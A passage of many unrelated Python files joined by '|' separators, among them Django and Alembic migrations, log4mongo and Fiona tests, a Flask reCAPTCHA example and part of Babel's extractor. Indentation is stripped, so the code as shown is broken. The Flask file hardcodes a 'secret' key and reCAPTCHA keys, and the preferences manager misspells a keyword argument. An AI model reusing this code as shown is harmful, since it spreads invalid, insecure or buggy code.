# RENDER ALL THE THINGS!
out = ""
colbreak = " " * 3
out += "".join((" %9.2f" % b for b in bursts_per_second))
out += colbreak
out += "".join((" %9.2f" % b for b in acks_per_second))
out += colbreak
out += "".join((" %9.2f" % b for b in mean_latencies))
out += colbreak
out += "".join((" %9.2f" % b for b in points_deferred_to_disk))
out += colbreak
out += "".join((" %9.2f" % b for b in points_read_from_disk))
out += colbreak
out += "".join((" %9.2f" % b for b in points_timed_out_sending))
out += colbreak
out += "%10d" % outstanding_points + '\n'
if self.lines_printed % 20 == 0:
self.print_header()
self.outstream.write(out)
self.outstream.flush()
self.lines_printed += 1
if __name__ == '__main__':
# Make stdin non-blocking
fd = sys.stdin.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
reader = ThroughputCounter(sys.stdin)
writer = ThroughputPrinter(reader, sys.stdout)
# Run an event loop to process outstanding input every second
# and then output the processed data
event_loop = TimeAware(1, [ reader.process_lines_from_stream,
writer.print_throughput ])
event_loop.run_forever()
|
DEBUG = False
BASEDIR = ''
SUBDIR = ''
PREFIX = ''
QUALITY = 85
CONVERT = '/usr/bin/convert'
WVPS = '/usr/bin/wvPS'
PROCESSORS = (
'populous.thumbnail.processors.colorspace',
'populous.thumbnail.processors.autocrop',
'populous.thumbnail.processors.scale_and_crop',
'populous.thumbnail.processors.filters',
)
|
"""Fichier contenant l'action detruire_sortie."""
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Détruit une sortie d'une salle."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.detruire_sortie, "Salle", "str")
@staticmethod
def detruire_sortie(salle, direction):
"""Détruit une sortie de salle et sa réciproque de la destination.
La direction est à choisir parmi est, ouest, nord, sud, nord-est,
nord-ouest, sud-est, sud-ouest, haut et bas.
"""
try:
direction = salle.sorties.get_nom_long(direction)
except KeyError:
raise ErreurExecution("direction {} inconnue".format(direction))
if not salle.sorties.sortie_existe(direction):
raise ErreurExecution("sortie {} non définie".format(direction))
d_salle = salle.sorties[direction].salle_dest
dir_opposee = salle.sorties.get_nom_oppose(direction)
d_salle.sorties.supprimer_sortie(dir_opposee)
salle.sorties.supprimer_sortie(direction)
|
from flask import Flask, render_template, flash, session, redirect, url_for
from wtforms import TextAreaField
from wtforms.validators import DataRequired
from flask.ext.wtf import Form
from flask.ext.wtf.recaptcha import RecaptchaField
DEBUG = True
SECRET_KEY = 'secret'
RECAPTCHA_PUBLIC_KEY = '6LeYIbsSAAAAACRPIllxA7wvXjIE411PfdB2gt2J'
RECAPTCHA_PRIVATE_KEY = '6LeYIbsSAAAAAJezaIq3Ft_hSTo0YtyeFG-JgRtu'
app = Flask(__name__)
app.config.from_object(__name__)
class CommentForm(Form):
comment = TextAreaField("Comment", validators=[DataRequired()])
recaptcha = RecaptchaField()
@app.route("/")
def index(form=None):
if form is None:
form = CommentForm()
comments = session.get("comments", [])
return render_template("index.html",
comments=comments,
form=form)
@app.route("/add/", methods=("POST",))
def add_comment():
form = CommentForm()
if form.validate_on_submit():
comments = session.pop('comments', [])
comments.append(form.comment.data)
session['comments'] = comments
flash("You have added a new comment")
return redirect(url_for("index"))
return index(form)
if __name__ == "__main__":
app.run()
|
from django.template import TemplateDoesNotExist, TemplateSyntaxError
from django.test import SimpleTestCase
from ..utils import setup
from .test_extends import inheritance_templates
class ExceptionsTests(SimpleTestCase):
@setup({'exception01': "{% extends 'nonexistent' %}"})
def test_exception01(self):
"""
Raise exception for invalid template name
"""
with self.assertRaises(TemplateDoesNotExist):
self.engine.render_to_string('exception01')
@setup({'exception02': '{% extends nonexistent %}'})
def test_exception02(self):
"""
Raise exception for invalid variable template name
"""
if self.engine.string_if_invalid:
with self.assertRaises(TemplateDoesNotExist):
self.engine.render_to_string('exception02')
else:
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('exception02')
@setup(
{'exception03': "{% extends 'inheritance01' %}"
"{% block first %}2{% endblock %}{% extends 'inheritance16' %}"},
inheritance_templates,
)
def test_exception03(self):
"""
Raise exception for extra {% extends %} tags
"""
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('exception03')
@setup(
{'exception04': "{% extends 'inheritance17' %}{% block first %}{% echo 400 %}5678{% endblock %}"},
inheritance_templates,
)
def test_exception04(self):
"""
Raise exception for custom tags used in child with {% load %} tag in parent, not in child
"""
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('exception04')
@setup({'exception05': '{% block first %}{{ block.super }}{% endblock %}'})
def test_exception05(self):
"""
Raise exception for block.super used in base template
"""
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('exception05')
|
import collections
from .settings import preferences_settings
from .exceptions import CachedValueNotFound, DoesNotExist
class PreferencesManager(collections.Mapping):
"""Handle retrieving / caching of preferences"""
def __init__(self, model, registry, **kwargs):
self.model = model
self.registry = registry
self.queryset = self.model.objects.all()
self.instance = kwargs.get('instance')
if self.instance:
self.queryset = self.queryset.filter(instance=self.instance)
@property
def cache(self):
from django.core.cache import caches
return caches['default']
def __getitem__(self, key):
return self.get(key)
def __setitem__(self, key, value):
section, name = self.parse_lookup(key)
self.update_db_pref(section=section, name=name, value=value)
def __repr__(self):
return repr(self.all())
def __iter__(self):
return self.all().__iter__()
def __len__(self):
return len(self.all())
def get_cache_key(self, section, name):
"""Return the cache key corresponding to a given preference"""
if not self.instance:
return 'dynamic_preferences_{0}_{1}_{2}'.format(self.model.__name__, section, name)
return 'dynamic_preferences_{0}_{1}_{2}_{3}'.format(self.model.__name__, section, name, self.instance.pk)
def from_cache(self, section, name):
"""Return a preference raw_value from cache"""
cached_value = self.cache.get(
self.get_cache_key(section, name), CachedValueNotFound)
if cached_value is CachedValueNotFound:
raise CachedValueNotFound
return self.registry.get(section=section, name=name).serializer.deserialize(cached_value)
def to_cache(self, pref):
"""Update/create the cache value for the given preference model instance"""
self.cache.set(
self.get_cache_key(pref.section, pref.name), pref.raw_value, None)
def pref_obj(self, section, name):
return self.registry.get(section=section, name=name)
def parse_lookup(self, lookup):
try:
section, name = lookup.split(
preferences_settings.SECTION_KEY_SEPARATOR)
except ValueError:
name = lookup
section = None
return section, name
def get(self, key, model=False):
"""Return the value of a single preference using a dotted path key"""
section, name = self.parse_lookup(key)
if model:
return self.get_db_pref(setion=section, name=name)
try:
return self.from_cache(section, name)
except CachedValueNotFound:
pass
db_pref = self.get_db_pref(section=section, name=name)
self.to_cache(db_pref)
return db_pref.value
def get_db_pref(self, section, name):
try:
pref = self.queryset.get(section=section, name=name)
except self.model.DoesNotExist:
pref_obj = self.pref_obj(section=section, name=name)
pref = self.create_db_pref(
section=section, name=name, value=pref_obj.default)
return pref
def update_db_pref(self, section, name, value):
try:
db_pref = self.queryset.get(section=section, name=name)
db_pref.value = value
db_pref.save()
except self.model.DoesNotExist:
return self.create_db_pref(section, name, value)
return db_pref
def create_db_pref(self, section, name, value):
if self.instance:
db_pref = self.model(
section=section, name=name, instance=self.instance)
else:
db_pref = self.model(section=section, name=name)
db_pref.value = value
db_pref.save()
return db_pref
def all(self):
"""Return a dictionnary containing all preferences by section
Loaded from cache or from db in case of cold cache
"""
a = {}
try:
for preference in self.registry.preferences():
a[preference.identifier()] = self.from_cache(
preference.section, preference.name)
except CachedValueNotFound:
return self.load_from_db()
return a
def load_from_db(self):
"""Return a dictionnary of preferences by section directly from DB"""
a = {}
db_prefs = {p.preference.identifier(): p for p in self.queryset}
for preference in self.registry.preferences():
try:
db_pref = db_prefs[preference.identifier()]
except KeyError:
db_pref = self.create_db_pref(
section=preference.section, name=preference.name, value=preference.default)
self.to_cache(db_pref)
a[preference.identifier()] = self.from_cache(
preference.section, preference.name)
return a
|
import unittest
import helper.config
import mock
from vetoes import config
class FeatureFlagMixinTests(unittest.TestCase):
def test_that_flags_are_processed_during_initialize(self):
settings = helper.config.Data({
'features': {'on': 'on', 'off': 'false'}
})
consumer = config.FeatureFlagMixin(settings, mock.Mock())
self.assertTrue(consumer.feature_flags['on'])
self.assertFalse(consumer.feature_flags['off'])
def test_that_invalid_flags_arg_ignored(self):
settings = helper.config.Data({
'features': {'one': 'not valid', 'two': None}
})
consumer = config.FeatureFlagMixin(settings, mock.Mock())
self.assertEqual(consumer.feature_flags, {})
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 7, transform = "Logit", sigma = 0.0, exog_count = 20, ar_order = 12);
|
"""
Module containing functions to differentiate functions using tensorflow.
"""
try:
import tensorflow as tf
from tensorflow.python.ops.gradients import _hessian_vector_product
except ImportError:
tf = None
from ._backend import Backend, assert_backend_available
class TensorflowBackend(Backend):
def __init__(self):
if tf is not None:
self._session = tf.Session()
def __str__(self):
return "tensorflow"
def is_available(self):
return tf is not None
@assert_backend_available
def is_compatible(self, objective, argument):
if isinstance(objective, tf.Tensor):
if (argument is None or not
isinstance(argument, tf.Variable) and not
all([isinstance(arg, tf.Variable)
for arg in argument])):
raise ValueError(
"Tensorflow backend requires an argument (or sequence of "
"arguments) with respect to which compilation is to be "
"carried out")
return True
return False
@assert_backend_available
def compile_function(self, objective, argument):
if not isinstance(argument, list):
def func(x):
feed_dict = {argument: x}
return self._session.run(objective, feed_dict)
else:
def func(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(objective, feed_dict)
return func
@assert_backend_available
def compute_gradient(self, objective, argument):
"""
Compute the gradient of 'objective' and return as a function.
"""
tfgrad = tf.gradients(objective, argument)
if not isinstance(argument, list):
def grad(x):
feed_dict = {argument: x}
return self._session.run(tfgrad[0], feed_dict)
else:
def grad(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(tfgrad, feed_dict)
return grad
@assert_backend_available
def compute_hessian(self, objective, argument):
if not isinstance(argument, list):
argA = tf.Variable(tf.zeros(tf.shape(argument)))
tfhess = _hessian_vector_product(objective, [argument], [argA])
def hess(x, a):
feed_dict = {argument: x, argA: a}
return self._session.run(tfhess[0], feed_dict)
else:
argA = [tf.Variable(tf.zeros(tf.shape(arg)))
for arg in argument]
tfhess = _hessian_vector_product(objective, argument, argA)
def hess(x, a):
feed_dict = {i: d for i, d in zip(argument+argA, x+a)}
return self._session.run(tfhess, feed_dict)
return hess
|
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
import photolib.models
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
('taggit', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),
('uuid', models.CharField(max_length=32, blank=True)),
('filename', models.CharField(help_text='A descriptive file name', max_length=128)),
('alt', models.CharField(help_text='alt attribute text for accessibility', max_length=255, blank=True)),
('caption', models.TextField(help_text='Recommended text to be used as photo caption.', blank=True)),
('notes', models.TextField(help_text='Any other notable information about this photo.', blank=True)),
('credits', models.TextField(help_text='Credits and copyright/left.', blank=True)),
('source', models.CharField(choices=[('Flickr', 'Flickr'), ('iStockphoto', 'iStockphoto')], max_length=32, blank=True)),
('source_url', models.URLField(help_text='Important when citation requires link to source.', blank=True)),
('image', models.ImageField(upload_to=photolib.models.upload_path)),
('uploaded', models.DateTimeField(default=datetime.datetime.utcnow)),
('last_updated', models.DateTimeField(default=datetime.datetime.utcnow, blank=True)),
('photo_tags', taggit.managers.TaggableManager(verbose_name='Tags', to='taggit.Tag', help_text='A comma-separated list of tags.', through='taggit.TaggedItem', blank=True)),
],
options={
'ordering': ('-uploaded',),
},
bases=(models.Model,),
),
]
|
"""empty message
Revision ID: 2357b6b3d76
Revises: fecca96b9d
Create Date: 2015-10-27 10:26:52.074526
"""
revision = '2357b6b3d76'
down_revision = 'fecca96b9d'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('citizen_complaints', sa.Column('service_type', sa.String(length=255), nullable=True))
op.add_column('citizen_complaints', sa.Column('source', sa.String(length=255), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('citizen_complaints', 'source')
op.drop_column('citizen_complaints', 'service_type')
### end Alembic commands ###
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Person.education'
db.add_column('person_person', 'education',
self.gf('django.db.models.fields.CharField')(default='', max_length=255, blank=True),
keep_default=False)
# Adding field 'Person.birthday'
db.add_column('person_person', 'birthday',
self.gf('django.db.models.fields.DateTimeField')(null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Person.education'
db.delete_column('person_person', 'education')
# Deleting field 'Person.birthday'
db.delete_column('person_person', 'birthday')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'person.person': {
'Meta': {'object_name': 'Person'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'education': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'default': "'unknown'", 'max_length': '7'}),
'nickname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'occupation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'normal'", 'max_length': '20'}),
'subscribing': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['person']
|
"""
Given a positive integer n and you can do operations as follow:
If n is even, replace n with n/2.
If n is odd, you can replace n with either n + 1 or n - 1.
What is the minimum number of replacements needed for n to become 1?
Example 1:
Input:
8
Output:
3
Explanation:
8 -> 4 -> 2 -> 1
Example 2:
Input:
7
Output:
4
Explanation:
7 -> 8 -> 4 -> 2 -> 1
or
7 -> 6 -> 3 -> 2 -> 1
"""
class Solution(object):
def integerReplacement(self, n):
"""
:type n: int
:rtype: int
"""
count = 0
while n > 1:
count += 1
if n % 2 == 0:
n /= 2
elif (n+1) % 4 == 0 and (n-1) > 2:
n += 1
else:
n -= 1
return count
|
import sys, os
sys.path.insert(0, os.path.abspath('..'))
extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'django-intercom'
copyright = u'2012, Ken Cochrane'
sys.path.insert(0, os.pardir)
m = __import__("intercom")
version = m.__version__
release = version
exclude_patterns = ['_build']
pygments_style = 'sphinx'
html_theme = 'default'
html_static_path = ['_static']
htmlhelp_basename = 'django-intercomdoc'
latex_elements = {
}
latex_documents = [
('index', 'django-intercom.tex', u'django-intercom Documentation',
u'Ken Cochrane', 'manual'),
]
man_pages = [
('index', 'django-intercom', u'django-intercom Documentation',
[u'Ken Cochrane'], 1)
]
texinfo_documents = [
('index', 'django-intercom', u'django-intercom Documentation',
u'Ken Cochrane', 'django-intercom', 'One line description of project.',
'Miscellaneous'),
]
epub_title = u'django-intercom'
epub_author = u'Ken Cochrane'
epub_publisher = u'Ken Cochrane'
epub_copyright = u'2012, Ken Cochrane'
|
from log4mongo.handlers import MongoHandler
from pymongo.errors import PyMongoError
from StringIO import StringIO
import unittest
import logging
import sys
class TestMongoHandler(unittest.TestCase):
host_name = 'localhost'
database_name = 'log4mongo_test'
collection_name = 'logs_test'
def setUp(self):
self.handler = MongoHandler(host=self.host_name, database_name=self.database_name, collection=self.collection_name)
self.log = logging.getLogger('testLogger')
self.log.setLevel(logging.DEBUG)
self.log.addHandler(self.handler)
self.old_stderr = sys.stdout
sys.stderr = StringIO()
def tearDown(self):
self.handler.connection.drop_database(self.database_name)
self.handler.close()
self.log.removeHandler(self.handler)
self.log = None
self.handler = None
sys.stderr.close()
sys.stderr = self.old_stderr
def test_connect(self):
handler = MongoHandler(host='localhost', database_name=self.database_name, collection=self.collection_name)
self.assertTrue(isinstance(handler, MongoHandler))
self.handler.connection.drop_database(self.database_name)
handler.close()
def test_connect_failed(self):
with self.assertRaises(PyMongoError):
MongoHandler(host='unknow_host', database_name=self.database_name, collection=self.collection_name)
def test_connect_failed_silent(self):
handler = MongoHandler(host='unknow_host', database_name=self.database_name, collection=self.collection_name, fail_silently=True)
self.assertTrue(isinstance(handler, MongoHandler))
self.handler.connection.drop_database(self.database_name)
handler.close()
def test_emit(self):
self.log.warning('test message')
document = self.handler.collection.find_one({'message': 'test message', 'level': 'WARNING'})
self.assertEqual(document['message'], 'test message')
self.assertEqual(document['level'], 'WARNING')
def test_emit_exception(self):
try:
raise Exception('exc1')
except:
self.log.exception('test message')
document = self.handler.collection.find_one({'message': 'test message', 'level': 'ERROR'})
self.assertEqual(document['message'], 'test message')
self.assertEqual(document['level'], 'ERROR')
self.assertEqual(document['exception']['message'], 'exc1')
def test_emit_fail(self):
self.handler.collection = ''
self.log.warn('test warning')
self.assertRegexpMatches(sys.stderr.getvalue(), r"AttributeError: 'str' object has no attribute 'save'")
def test_email_fail_silent(self):
self.handler.fail_silently = True
self.handler.collection = ''
self.log.warn('test warming')
self.assertEqual(sys.stderr.getvalue(), '')
def test_contextual_info(self):
self.log.info('test message with contextual info', extra={'ip': '127.0.0.1', 'host': 'localhost'})
document = self.handler.collection.find_one({'message': 'test message with contextual info', 'level': 'INFO'})
self.assertEqual(document['message'], 'test message with contextual info')
self.assertEqual(document['level'], 'INFO')
self.assertEqual(document['ip'], '127.0.0.1')
self.assertEqual(document['host'], 'localhost')
def test_contextual_info_adapter(self):
adapter = logging.LoggerAdapter(self.log, {'ip': '127.0.0.1', 'host': 'localhost'})
adapter.info('test message with contextual info')
document = self.handler.collection.find_one({'message': 'test message with contextual info', 'level': 'INFO'})
self.assertEqual(document['message'], 'test message with contextual info')
self.assertEqual(document['level'], 'INFO')
self.assertEqual(document['ip'], '127.0.0.1')
self.assertEqual(document['host'], 'localhost')
class TestCappedMongoHandler(TestMongoHandler):
capped_max = 10
def setUp(self):
self.handler = MongoHandler(host=self.host_name, database_name=self.database_name,
collection=self.collection_name, capped=True, capped_max=self.capped_max)
self.log = logging.getLogger('testLogger')
self.log.setLevel(logging.DEBUG)
self.log.addHandler(self.handler)
self.old_stderr = sys.stdout
sys.stderr = StringIO()
def test_capped(self):
options = self.handler.db.command('collstats', self.collection_name)
self.assertEqual(options['max'], 10)
self.assertEqual(options['capped'], 1)
def test_capped_max(self):
for i in range(self.capped_max * 2):
self.log.info('test capped info')
documents = self.handler.collection.find()
self.assertEqual(documents.count(), 10)
def test_override_no_capped_collection(self):
# Creating no capped handler
self.handler_no_capped = MongoHandler(host=self.host_name, database_name=self.database_name, collection=self.collection_name)
self.log.removeHandler(self.handler)
self.log.addHandler(self.handler_no_capped)
self.log.info('test info')
# Creating capped handler
self.handler_capped = MongoHandler(host=self.host_name, database_name=self.database_name,
collection=self.collection_name, capped=True, capped_max=self.capped_max)
self.log.addHandler(self.handler)
self.log.info('test info')
def test_override_capped_collection(self):
# Creating capped handler
self.handler_capped = MongoHandler(host=self.host_name, database_name=self.database_name,
collection=self.collection_name, capped=True, capped_max=self.capped_max)
self.log.removeHandler(self.handler)
self.log.addHandler(self.handler)
self.log.info('test info')
# Creating no capped handler
self.handler_no_capped = MongoHandler(host=self.host_name, database_name=self.database_name, collection=self.collection_name)
self.log.addHandler(self.handler_no_capped)
self.log.info('test info')
|
import logging
import os
import os.path
import shutil
import sys
import tempfile
import unittest
import pytest
import fiona
from fiona.collection import supported_drivers
from fiona.errors import FionaValueError, DriverError, SchemaError, CRSError
from fiona.ogrext import calc_gdal_version_num, get_gdal_version_num
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
class ReadingTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@pytest.mark.skipif(not os.path.exists('tests/data/coutwildrnp.gpkg'),
reason="Requires geopackage fixture")
def test_gpkg(self):
if get_gdal_version_num() < calc_gdal_version_num(1, 11, 0):
self.assertRaises(DriverError, fiona.open, 'tests/data/coutwildrnp.gpkg', 'r', driver="GPKG")
else:
with fiona.open('tests/data/coutwildrnp.gpkg', 'r', driver="GPKG") as c:
self.assertEquals(len(c), 48)
class WritingTest(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tempdir)
@pytest.mark.skipif(not os.path.exists('tests/data/coutwildrnp.gpkg'),
reason="Requires geopackage fixture")
def test_gpkg(self):
schema = {'geometry': 'Point',
'properties': [('title', 'str')]}
crs = {
'a': 6370997,
'lon_0': -100,
'y_0': 0,
'no_defs': True,
'proj': 'laea',
'x_0': 0,
'units': 'm',
'b': 6370997,
'lat_0': 45}
path = os.path.join(self.tempdir, 'foo.gpkg')
if get_gdal_version_num() < calc_gdal_version_num(1, 11, 0):
self.assertRaises(DriverError,
fiona.open,
path,
'w',
driver='GPKG',
schema=schema,
crs=crs)
else:
with fiona.open(path, 'w',
driver='GPKG',
schema=schema,
crs=crs) as c:
c.writerecords([{
'geometry': {'type': 'Point', 'coordinates': [0.0, 0.0]},
'properties': {'title': 'One'}}])
c.writerecords([{
'geometry': {'type': 'Point', 'coordinates': [2.0, 3.0]},
'properties': {'title': 'Two'}}])
with fiona.open(path) as c:
self.assertEquals(c.schema['geometry'], 'Point')
self.assertEquals(len(c), 2)
|
"""Basic infrastructure for extracting localizable messages from source files.
This module defines an extensible system for collecting localizable message
strings from a variety of sources. A native extractor for Python source files
is builtin, extractors for other sources can be added using very simple plugins.
The main entry points into the extraction functionality are the functions
`extract_from_dir` and `extract_from_file`.
"""
import os
import sys
from tokenize import generate_tokens, COMMENT, NAME, OP, STRING
from babel.util import parse_encoding, pathmatch, relpath
from textwrap import dedent
__all__ = ['extract', 'extract_from_dir', 'extract_from_file']
__docformat__ = 'restructuredtext en'
GROUP_NAME = 'babel.extractors'
DEFAULT_KEYWORDS = {
'_': None,
'gettext': None,
'ngettext': (1, 2),
'ugettext': None,
'ungettext': (1, 2),
'dgettext': (2,),
'dngettext': (2, 3),
'N_': None
}
DEFAULT_MAPPING = [('**.py', 'python')]
empty_msgid_warning = (
'%s: warning: Empty msgid. It is reserved by GNU gettext: gettext("") '
'returns the header entry with meta information, not the empty string.')
def _strip_comment_tags(comments, tags):
"""Helper function for `extract` that strips comment tags from strings
in a list of comment lines. This functions operates in-place.
"""
def _strip(line):
for tag in tags:
if line.startswith(tag):
return line[len(tag):].strip()
return line
comments[:] = map(_strip, comments)
def extract_from_dir(dirname=os.getcwd(), method_map=DEFAULT_MAPPING,
options_map=None, keywords=DEFAULT_KEYWORDS,
comment_tags=(), callback=None, strip_comment_tags=False):
"""Extract messages from any source files found in the given directory.
This function generates tuples of the form:
``(filename, lineno, message, comments)``
Which extraction method is used per file is determined by the `method_map`
parameter, which maps extended glob patterns to extraction method names.
For example, the following is the default mapping:
>>> method_map = [
... ('**.py', 'python')
... ]
This basically says that files with the filename extension ".py" at any
level inside the directory should be processed by the "python" extraction
method. Files that don't match any of the mapping patterns are ignored. See
the documentation of the `pathmatch` function for details on the pattern
syntax.
The following extended mapping would also use the "genshi" extraction
method on any file in "templates" subdirectory:
>>> method_map = [
... ('**/templates/**.*', 'genshi'),
... ('**.py', 'python')
... ]
The dictionary provided by the optional `options_map` parameter augments
these mappings. It uses extended glob patterns as keys, and the values are
dictionaries mapping options names to option values (both strings).
The glob patterns of the `options_map` do not necessarily need to be the
same as those used in the method mapping. For example, while all files in
the ``templates`` folders in an application may be Genshi applications, the
options for those files may differ based on extension:
>>> options_map = {
... '**/templates/**.txt': {
... 'template_class': 'genshi.template:TextTemplate',
... 'encoding': 'latin-1'
... },
... '**/templates/**.html': {
... 'include_attrs': ''
... }
... }
:param dirname: the path to the directory to extract messages from
:param method_map: a list of ``(pattern, method)`` tuples that maps of
extraction method names to extended glob patterns
:param options_map: a dictionary of additional options (optional)
:param keywords: a dictionary mapping keywords (i.e. names of functions
that should be recognized as translation functions) to
tuples that specify which of their arguments contain
localizable strings
:param comment_tags: a list of tags of translator comments to search for
and include in the results
:param callback: a function that is called for every file that message are
extracted from, just before the extraction itself is
performed; the function is passed the filename, the name
of the extraction method and and the options dictionary as
positional arguments, in that order
:param strip_comment_tags: a flag that if set to `True` causes all comment
tags to be removed from the collected comments.
:return: an iterator over ``(filename, lineno, funcname, message)`` tuples
:rtype: ``iterator``
:see: `pathmatch`
"""
if options_map is None:
options_map = {}
absname = os.path.abspath(dirname)
for root, dirnames, filenames in os.walk(absname):
for subdir in dirnames:
if subdir.startswith('.') or subdir.startswith('_'):
dirnames.remove(subdir)
dirnames.sort()
filenames.sort()
for filename in filenames:
filename = relpath(
os.path.join(root, filename).replace(os.sep, '/'),
dirname
)
for pattern, method in method_map:
if pathmatch(pattern, filename):
filepath = os.path.join(absname, filename)
options = {}
for opattern, odict in options_map.items():
if pathmatch(opattern, filename):
options = odict
if callback:
callback(filename, method, options)
for lineno, message, comments in \
extract_from_file(method, filepath,
keywords=keywords,
comment_tags=comment_tags,
options=options,
strip_comment_tags=
strip_comment_tags):
yield filename, lineno, message, comments
break
def extract_from_file(method, filename, keywords=DEFAULT_KEYWORDS,
comment_tags=(), options=None, strip_comment_tags=False):
"""Extract messages from a specific file.
This function returns a list of tuples of the form:
``(lineno, funcname, message)``
:param filename: the path to the file to extract messages from
:param method: a string specifying the extraction method (.e.g. "python")
:param keywords: a dictionary mapping keywords (i.e. names of functions
that should be recognized as translation functions) to
tuples that specify which of their arguments contain
localizable strings
:param comment_tags: a list of translator tags to search for and include
in the results
:param strip_comment_tags: a flag that if set to `True` causes all comment
tags to be removed from the collected comments.
:param options: a dictionary of additional options (optional)
:return: the list of extracted messages
:rtype: `list`
"""
fileobj = open(filename, 'U')
try:
return list(extract(method, fileobj, keywords, comment_tags, options,
strip_comment_tags))
finally:
fileobj.close()
def extract(method, fileobj, keywords=DEFAULT_KEYWORDS, comment_tags=(),
options=None, strip_comment_tags=False):
"""Extract messages from the given file-like object using the specified
extraction method.
This function returns a list of tuples of the form:
``(lineno, message, comments)``
The implementation dispatches the actual extraction to plugins, based on the
value of the ``method`` parameter.
>>> source = '''# foo module
... def run(argv):
... print _('Hello, world!')
... '''
>>> from StringIO import StringIO
>>> for message in extract('python', StringIO(source)):
... print message
(3, u'Hello, world!', [])
:param method: a string specifying the extraction method (.e.g. "python");
if this is a simple name, the extraction function will be
looked up by entry point; if it is an explicit reference
to a function (of the form ``package.module:funcname`` or
``package.module.funcname``), the corresponding function
will be imported and used
:param fileobj: the file-like object the messages should be extracted from
:param keywords: a dictionary mapping keywords (i.e. names of functions
that should be recognized as translation functions) to
tuples that specify which of their arguments contain
localizable strings
:param comment_tags: a list of translator tags to search for and include
in the results
:param options: a dictionary of additional options (optional)
:param strip_comment_tags: a flag that if set to `True` causes all comment
tags to be removed from the collected comments.
:return: the list of extracted messages
:rtype: `list`
:raise ValueError: if the extraction method is not registered
"""
func = None
if ':' in method or '.' in method:
if ':' not in method:
lastdot = method.rfind('.')
module, attrname = method[:lastdot], method[lastdot + 1:]
else:
